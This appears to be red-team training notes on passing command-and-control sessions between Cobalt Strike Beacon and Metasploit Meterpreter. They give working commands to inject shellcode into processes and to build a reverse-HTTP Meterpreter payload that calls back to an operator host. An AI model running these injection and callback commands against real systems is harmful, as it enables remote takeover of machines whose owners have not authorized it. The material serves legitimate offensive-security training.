Session Passing

Session passing is a process where you spawn a new C2 session from one payload/listener type to another. It's also possible to pass sessions between completely different C2 frameworks, such as spawning a Meterpreter session from Beacon.

- Beacon Passing

The spawn command will spawn an x86 or x64 process and inject shellcode for the specified listener into it.

For example, you have a DNS Beacon and instead of operating through this Beacon, you want to leave it open as a lifeline on a slow check-in. In which case, you can spawn a new HTTP session and work from there instead.

spawn x64 http

- Foreign Listener

The foreign listener in Cobalt Strike is designed to stage Meterpreter HTTP/HTTPS implants from Beacon, although it's technically compatible with any implant that supports the MSF staging protocol. Start msfconsole and create a new reverse HTTP Meterpreter listener. (You must use the "staged" reverse_http payload type and ensure you use a port that Cobalt Strike is not already listening on.)

sudo msfconsole -q

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set LHOST ens5

set LPORT 8080

run

Then in Cobalt create a new Foreign HTTP listener. The stager host and port must match your MSF multi handler.

This listener will now be available within all the relevant Beacon commands such as spawn, jump and elevate. For instance, spawn msf will spawn a process and inject Meterpreter shellcode into it, thus giving us a Meterpreter session.

Two downsides to the foreign listener is that it only supports x86 staged payloads (no x64 or stageless).

- Spawn & Inject

Cobalt Strike has two further generic injection commands that can be utilised for the purpose of session passing: shinject and shspawn. Both allow you to inject an arbitrary shellcode blob - shinject can inject into an existing process, and shspawn will spawn a new process.

We have to use a stageless x64 Meterpreter payload.

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_http

msf6 exploit(multi/handler) > exploit

ubuntu@DESKTOP-3BSK7NO ~> msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.5.50 LPORT=8080 -f raw -o /mnt/c/Payloads/msf_http_x64.bin

beacon> shspawn x64 C:\Payloads\msf_http_x64.bin